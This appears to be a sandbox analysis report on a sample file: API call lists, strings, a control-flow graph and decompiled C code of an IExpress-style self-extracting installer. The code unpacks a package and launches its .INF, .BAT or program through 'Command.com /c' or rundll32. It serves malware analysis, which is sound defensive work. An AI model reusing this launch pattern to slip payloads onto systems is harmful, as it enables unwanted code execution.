                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3e03
                                                                                                                                                                                                      0x000e3e0a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3e15
                                                                                                                                                                                                      0x000e3e17
                                                                                                                                                                                                      0x000e3e19
                                                                                                                                                                                                      0x000e3f94
                                                                                                                                                                                                      0x000e3fa4
                                                                                                                                                                                                      0x000e3f7c
                                                                                                                                                                                                      0x000e3f80
                                                                                                                                                                                                      0x000e3f8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f8b
                                                                                                                                                                                                      0x000e3e2c
                                                                                                                                                                                                      0x000e3e30
                                                                                                                                                                                                      0x000e3e34
                                                                                                                                                                                                      0x000e3e36
                                                                                                                                                                                                      0x000e3f69
                                                                                                                                                                                                      0x000e3f6e
                                                                                                                                                                                                      0x000e3f70
                                                                                                                                                                                                      0x000e3f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f76
                                                                                                                                                                                                      0x000e3e3c
                                                                                                                                                                                                      0x000e3e43
                                                                                                                                                                                                      0x000e3e47
                                                                                                                                                                                                      0x000e3e52
                                                                                                                                                                                                      0x000e3e56
                                                                                                                                                                                                      0x000e3e5c
                                                                                                                                                                                                      0x000e3e61
                                                                                                                                                                                                      0x000e3e68
                                                                                                                                                                                                      0x000e3e70
                                                                                                                                                                                                      0x000e3e74
                                                                                                                                                                                                      0x000e3e7c
                                                                                                                                                                                                      0x000e3e80
                                                                                                                                                                                                      0x000e3e82
                                                                                                                                                                                                      0x000e3e82
                                                                                                                                                                                                      0x000e3e87
                                                                                                                                                                                                      0x000e3e87
                                                                                                                                                                                                      0x000e3e8b
                                                                                                                                                                                                      0x000e3e91
                                                                                                                                                                                                      0x000e3e94
                                                                                                                                                                                                      0x000e3e96
                                                                                                                                                                                                      0x000e3e96
                                                                                                                                                                                                      0x000e3e9b
                                                                                                                                                                                                      0x000e3e9b
                                                                                                                                                                                                      0x000e3e9f
                                                                                                                                                                                                      0x000e3ea2
                                                                                                                                                                                                      0x000e3ea4
                                                                                                                                                                                                      0x000e3ea4
                                                                                                                                                                                                      0x000e3ea9
                                                                                                                                                                                                      0x000e3ea9
                                                                                                                                                                                                      0x000e3ead
                                                                                                                                                                                                      0x000e3eb3
                                                                                                                                                                                                      0x000e3eb6
                                                                                                                                                                                                      0x000e3eb8
                                                                                                                                                                                                      0x000e3eb8
                                                                                                                                                                                                      0x000e3ebd
                                                                                                                                                                                                      0x000e3ebd
                                                                                                                                                                                                      0x000e3ec1
                                                                                                                                                                                                      0x000e3ec3
                                                                                                                                                                                                      0x000e3ec5
                                                                                                                                                                                                      0x000e3ec5
                                                                                                                                                                                                      0x000e3eca
                                                                                                                                                                                                      0x000e3eca
                                                                                                                                                                                                      0x000e3ece
                                                                                                                                                                                                      0x000e3ed5
                                                                                                                                                                                                      0x000e3ed9
                                                                                                                                                                                                      0x000e3ee0
                                                                                                                                                                                                      0x000e3ee6
                                                                                                                                                                                                      0x000e3eea
                                                                                                                                                                                                      0x000e3eec
                                                                                                                                                                                                      0x000e3eee
                                                                                                                                                                                                      0x000e3ef3
                                                                                                                                                                                                      0x000e3ef3
                                                                                                                                                                                                      0x000e3ef5
                                                                                                                                                                                                      0x000e3efa
                                                                                                                                                                                                      0x000e3efb
                                                                                                                                                                                                      0x000e3efd
                                                                                                                                                                                                      0x000e3f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3eff
                                                                                                                                                                                                      0x000e3eff
                                                                                                                                                                                                      0x000e3f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3f05
                                                                                                                                                                                                      0x000e3efd
                                                                                                                                                                                                      0x000e3dc7
                                                                                                                                                                                                      0x000e3dce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3dd0
                                                                                                                                                                                                      0x000e3dd7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3dd9
                                                                                                                                                                                                      0x000e3ddb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3ddd
                                                                                                                                                                                                      0x000e3de1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3de1
                                                                                                                                                                                                      0x000e3d59
                                                                                                                                                                                                      0x000e3d65
                                                                                                                                                                                                      0x000e3d6a
                                                                                                                                                                                                      0x000e3d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3d6e
                                                                                                                                                                                                      0x000e3d75
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3d8f
                                                                                                                                                                                                      0x000e3d96
                                                                                                                                                                                                      0x000e3d98
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3d98
                                                                                                                                                                                                      0x000e3c8f
                                                                                                                                                                                                      0x000e3c98
                                                                                                                                                                                                      0x000e3cf1
                                                                                                                                                                                                      0x000e3cf3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3cfe
                                                                                                                                                                                                      0x000e3d11
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3d11
                                                                                                                                                                                                      0x000e3c9c
                                                                                                                                                                                                      0x000e3ca5
                                                                                                                                                                                                      0x000e3ca7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3cad
                                                                                                                                                                                                      0x000e3cb2
                                                                                                                                                                                                      0x000e3cb7
                                                                                                                                                                                                      0x000e3cc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3ce8
                                                                                                                                                                                                      0x000e3cec
                                                                                                                                                                                                      0x000e3ced
                                                                                                                                                                                                      0x000e3ced
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3ce8
                                                                                                                                                                                                      0x000e3c9e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3c9e
                                                                                                                                                                                                      0x000e3c56
                                                                                                                                                                                                      0x000e3d35
                                                                                                                                                                                                      0x000e3d35
                                                                                                                                                                                                      0x000e3d3c
                                                                                                                                                                                                      0x000e3d48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e3d48
                                                                                                                                                                                                      0x000e3c03
                                                                                                                                                                                                      0x000e3be2
                                                                                                                                                                                                      0x000e3be7
                                                                                                                                                                                                      0x000e3bee
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 000E3C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 000E3CDC
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46A0
                                                                                                                                                                                                        • Part of subcall function 000E468F: SizeofResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46A9
                                                                                                                                                                                                        • Part of subcall function 000E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000E46C3
                                                                                                                                                                                                        • Part of subcall function 000E468F: LoadResource.KERNEL32(00000000,00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46CC
                                                                                                                                                                                                        • Part of subcall function 000E468F: LockResource.KERNEL32(00000000,?,000E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46D3
                                                                                                                                                                                                        • Part of subcall function 000E468F: memcpy_s.MSVCRT ref: 000E46E5
                                                                                                                                                                                                        • Part of subcall function 000E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000E46EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,000E8C42), ref: 000E3D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 000E3E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,000E8C42), ref: 000E3EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,000E8C42), ref: 000E3F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,000E8C42), ref: 000E3F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,000E8C42), ref: 000E3F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,000E8C42), ref: 000E3F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,000E8C42), ref: 000E3F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,000E8C42), ref: 000E3FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-3362248971
                                                                                                                                                                                                      • Opcode ID: 0fc0652599166593dc1f00134c6f02e60619a3d2a7c7831407468657eb796e04
                                                                                                                                                                                                      • Instruction ID: 252f14eda7710c08c062f547440d266d7382b88db2616571d081fc51382b59af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fc0652599166593dc1f00134c6f02e60619a3d2a7c7831407468657eb796e04
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4B1D3706083C19FE7649F26DC8976B7AE4EB85B00F10492DFA95FB291D778C940CB92
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 141 e1ae8-e1b2c call e1680 144 e1b2e-e1b39 141->144 145 e1b3b-e1b40 141->145 146 e1b46-e1b61 call e1a84 144->146 145->146 149 e1b9f-e1bc2 call e1781 call e658a 146->149 150 e1b63-e1b65 146->150 157 e1bc7-e1bd3 call e66c8 149->157 151 e1b68-e1b6d 150->151 151->151 153 e1b6f-e1b74 151->153 153->149 155 e1b76-e1b7b 153->155 158 e1b7d-e1b81 155->158 159 e1b83-e1b86 155->159 165 e1bd9-e1bf1 CompareStringA 157->165 166 e1d73-e1d7f call e66c8 157->166 158->159 161 e1b8c-e1b9d call e1680 158->161 159->149 162 e1b88-e1b8a 159->162 161->157 162->149 162->161 165->166 168 e1bf7-e1c07 GetFileAttributesA 165->168 175 e1df8-e1e09 LocalAlloc 166->175 176 e1d81-e1d99 CompareStringA 166->176 170 e1c0d-e1c15 168->170 171 e1d53-e1d5e 168->171 170->171 174 e1c1b-e1c33 call e1a84 170->174 173 e1d64-e1d6e call e44b9 171->173 187 e1e94-e1ea4 call e6ce0 173->187 189 e1c35-e1c38 174->189 190 e1c50-e1c61 LocalAlloc 174->190 178 e1e0b-e1e1b GetFileAttributesA 175->178 179 e1dd4-e1ddf 175->179 176->175 181 e1d9b-e1da2 176->181 183 e1e1d-e1e1f 178->183 184 e1e67-e1e73 call e1680 178->184 179->173 186 e1da5-e1daa 181->186 183->184 188 e1e21-e1e3e call e1781 183->188 199 e1e78-e1e84 call e2aac 184->199 186->186 191 e1dac-e1db4 186->191 188->199 210 e1e40-e1e43 188->210 195 e1c3a 189->195 196 e1c40-e1c4b call e1a84 189->196 190->179 198 e1c67-e1c72 190->198 197 e1db7-e1dbc 191->197 195->196 196->190 197->197 204 e1dbe-e1dd2 LocalAlloc 197->204 205 e1c79-e1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->205 206 e1c74 198->206 207 e1e89-e1e92 199->207 204->179 211 e1de1-e1df3 call e171e 204->211 208 e1cf8-e1d07 205->208 209 e1cc2-e1ccc 205->209 206->205 207->187 215 e1d09-e1d21 GetShortPathNameA 208->215 216 e1d23 208->216 212 e1cce 209->212 213 e1cd3-e1cf3 call e1680 * 2 209->213 210->199 214 e1e45-e1e65 call e16b3 * 2 210->214 211->207 212->213 213->207 214->199 221 e1d28-e1d2b 215->221 216->221 224 e1d2d 221->224 225 e1d32-e1d4e call e171e 221->225 224->225 225->207
                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E000E1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E000E1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t111 =  &_v1556;
                                                                                                                                                                                                      				_v1556 = _t53;
                                                                                                                                                                                                      				_t54 = E000E1A84(_t111, _t135);
                                                                                                                                                                                                      				_t156 = _v1556;
                                                                                                                                                                                                      				_t151 = _t54;
                                                                                                                                                                                                      				if(_t156 == 0) {
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					_push(_t111);
                                                                                                                                                                                                      					E000E1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                      					E000E658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t132 = _t156;
                                                                                                                                                                                                      					_t148 =  &(_t132[1]);
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t105 =  *_t132;
                                                                                                                                                                                                      						_t132 =  &(_t132[1]);
                                                                                                                                                                                                      					} while (_t105 != 0);
                                                                                                                                                                                                      					_t111 = _t132 - _t148;
                                                                                                                                                                                                      					if(_t111 < 3) {
                                                                                                                                                                                                      						goto L12;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t106 = _t156[1];
                                                                                                                                                                                                      					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                      						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                      							goto L12;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							goto L11;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						E000E1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t138 = 0x2e;
                                                                                                                                                                                                      						_t57 = E000E66C8(_t156, _t138);
                                                                                                                                                                                                      						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                      							_t139 = 0x2e;
                                                                                                                                                                                                      							_t115 = _t156;
                                                                                                                                                                                                      							_t58 = E000E66C8(_t115, _t139);
                                                                                                                                                                                                      							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									goto L43;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                      								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                      									E000E1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_push(_t115);
                                                                                                                                                                                                      									_t108 = 0x400;
                                                                                                                                                                                                      									E000E1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                      									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                      										E000E16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                      										E000E16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = _t156;
                                                                                                                                                                                                      								 *_t156 = 0;
                                                                                                                                                                                                      								E000E2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t108 = "Command.com /c %s";
                                                                                                                                                                                                      								_t125 = "Command.com /c %s";
                                                                                                                                                                                                      								_t145 = _t125 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t76 =  *_t125;
                                                                                                                                                                                                      									_t125 = _t125 + 1;
                                                                                                                                                                                                      								} while (_t76 != 0);
                                                                                                                                                                                                      								_t126 = _t125 - _t145;
                                                                                                                                                                                                      								_t146 =  &_v268;
                                                                                                                                                                                                      								_t157 = _t146 + 1;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t77 =  *_t146;
                                                                                                                                                                                                      									_t146 = _t146 + 1;
                                                                                                                                                                                                      								} while (_t77 != 0);
                                                                                                                                                                                                      								_t140 = _t146 - _t157;
                                                                                                                                                                                                      								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                      								if(_t156 != 0) {
                                                                                                                                                                                                      									E000E171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                      									goto L53;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								goto L43;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t140 = 0x525;
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_push(0x10);
                                                                                                                                                                                                      								_push(0);
                                                                                                                                                                                                      								_t60 =  &_v268;
                                                                                                                                                                                                      								goto L35;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t140 = "[";
                                                                                                                                                                                                      								_v1556 = _t151;
                                                                                                                                                                                                      								_t90 = E000E1A84( &_v1556, "[");
                                                                                                                                                                                                      								if(_t90 != 0) {
                                                                                                                                                                                                      									if( *_t90 != 0) {
                                                                                                                                                                                                      										_v1556 = _t90;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "]";
                                                                                                                                                                                                      									E000E1A84( &_v1556, "]");
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                      								if(_t156 == 0) {
                                                                                                                                                                                                      									L43:
                                                                                                                                                                                                      									_t60 = 0;
                                                                                                                                                                                                      									_t140 = 0x4b5;
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									_push(0x10);
                                                                                                                                                                                                      									_push(0);
                                                                                                                                                                                                      									L35:
                                                                                                                                                                                                      									_push(_t60);
                                                                                                                                                                                                      									E000E44B9(0, _t140);
                                                                                                                                                                                                      									_t62 = 0;
                                                                                                                                                                                                      									goto L54;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t155 = _v1556;
                                                                                                                                                                                                      									_t92 = _t155;
                                                                                                                                                                                                      									if( *_t155 == 0) {
                                                                                                                                                                                                      										_t92 = "DefaultInstall";
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									 *0xe9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                      									 *_v1560 = 1;
                                                                                                                                                                                                      									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                      										 *0xe9a34 =  *0xe9a34 & 0xfffffffb;
                                                                                                                                                                                                      										if( *0xe9a40 != 0) {
                                                                                                                                                                                                      											_t108 = "setupapi.dll";
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t108 = "setupx.dll";
                                                                                                                                                                                                      											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_push( &_v268);
                                                                                                                                                                                                      										_push(_t155);
                                                                                                                                                                                                      										E000E171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										 *0xe9a34 =  *0xe9a34 | 0x00000004;
                                                                                                                                                                                                      										if( *_t155 == 0) {
                                                                                                                                                                                                      											_t155 = "DefaultInstall";
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										E000E1680(_t108, 0x104, _t155);
                                                                                                                                                                                                      										_t140 = 0x200;
                                                                                                                                                                                                      										E000E1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									L53:
                                                                                                                                                                                                      									_t62 = 1;
                                                                                                                                                                                                      									 *_v1564 = _t156;
                                                                                                                                                                                                      									L54:
                                                                                                                                                                                                      									_pop(_t152);
                                                                                                                                                                                                      									return E000E6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}














































                                                                                                                                                                                                      0x000e1af3
                                                                                                                                                                                                      0x000e1afa
                                                                                                                                                                                                      0x000e1b07
                                                                                                                                                                                                      0x000e1b09
                                                                                                                                                                                                      0x000e1b1a
                                                                                                                                                                                                      0x000e1b20
                                                                                                                                                                                                      0x000e1b2c
                                                                                                                                                                                                      0x000e1b3b
                                                                                                                                                                                                      0x000e1b40
                                                                                                                                                                                                      0x000e1b2e
                                                                                                                                                                                                      0x000e1b2e
                                                                                                                                                                                                      0x000e1b33
                                                                                                                                                                                                      0x000e1b33
                                                                                                                                                                                                      0x000e1b46
                                                                                                                                                                                                      0x000e1b4c
                                                                                                                                                                                                      0x000e1b52
                                                                                                                                                                                                      0x000e1b57
                                                                                                                                                                                                      0x000e1b5d
                                                                                                                                                                                                      0x000e1b61
                                                                                                                                                                                                      0x000e1b9f
                                                                                                                                                                                                      0x000e1b9f
                                                                                                                                                                                                      0x000e1bb1
                                                                                                                                                                                                      0x000e1bc2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1b63
                                                                                                                                                                                                      0x000e1b63
                                                                                                                                                                                                      0x000e1b65
                                                                                                                                                                                                      0x000e1b68
                                                                                                                                                                                                      0x000e1b68
                                                                                                                                                                                                      0x000e1b6a
                                                                                                                                                                                                      0x000e1b6b
                                                                                                                                                                                                      0x000e1b6f
                                                                                                                                                                                                      0x000e1b74
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1b76
                                                                                                                                                                                                      0x000e1b7b
                                                                                                                                                                                                      0x000e1b86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1b8c
                                                                                                                                                                                                      0x000e1b8c
                                                                                                                                                                                                      0x000e1b98
                                                                                                                                                                                                      0x000e1bc7
                                                                                                                                                                                                      0x000e1bc9
                                                                                                                                                                                                      0x000e1bcc
                                                                                                                                                                                                      0x000e1bd3
                                                                                                                                                                                                      0x000e1d75
                                                                                                                                                                                                      0x000e1d76
                                                                                                                                                                                                      0x000e1d78
                                                                                                                                                                                                      0x000e1d7f
                                                                                                                                                                                                      0x000e1e05
                                                                                                                                                                                                      0x000e1e09
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1e12
                                                                                                                                                                                                      0x000e1e1b
                                                                                                                                                                                                      0x000e1e73
                                                                                                                                                                                                      0x000e1e21
                                                                                                                                                                                                      0x000e1e21
                                                                                                                                                                                                      0x000e1e28
                                                                                                                                                                                                      0x000e1e37
                                                                                                                                                                                                      0x000e1e3e
                                                                                                                                                                                                      0x000e1e52
                                                                                                                                                                                                      0x000e1e60
                                                                                                                                                                                                      0x000e1e60
                                                                                                                                                                                                      0x000e1e3e
                                                                                                                                                                                                      0x000e1e79
                                                                                                                                                                                                      0x000e1e7b
                                                                                                                                                                                                      0x000e1e84
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1d9b
                                                                                                                                                                                                      0x000e1d9b
                                                                                                                                                                                                      0x000e1da0
                                                                                                                                                                                                      0x000e1da2
                                                                                                                                                                                                      0x000e1da5
                                                                                                                                                                                                      0x000e1da5
                                                                                                                                                                                                      0x000e1da7
                                                                                                                                                                                                      0x000e1da8
                                                                                                                                                                                                      0x000e1dac
                                                                                                                                                                                                      0x000e1dae
                                                                                                                                                                                                      0x000e1db4
                                                                                                                                                                                                      0x000e1db7
                                                                                                                                                                                                      0x000e1db7
                                                                                                                                                                                                      0x000e1db9
                                                                                                                                                                                                      0x000e1dba
                                                                                                                                                                                                      0x000e1dbe
                                                                                                                                                                                                      0x000e1dc3
                                                                                                                                                                                                      0x000e1dce
                                                                                                                                                                                                      0x000e1dd2
                                                                                                                                                                                                      0x000e1deb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1df0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e1dd2
                                                                                                                                                                                                      0x000e1bf7
                                                                                                                                                                                                      0x000e1bfe
                                                                                                                                                                                                      0x000e1c07
                                                                                                                                                                                                      0x000e1d55
                                                                                                                                                                                                      0x000e1d5a
                                                                                                                                                                                                      0x000e1d5b
                                                                                                                                                                                                      0x000e1d5d
                                                                                                                                                                                                      0x000e1d5e
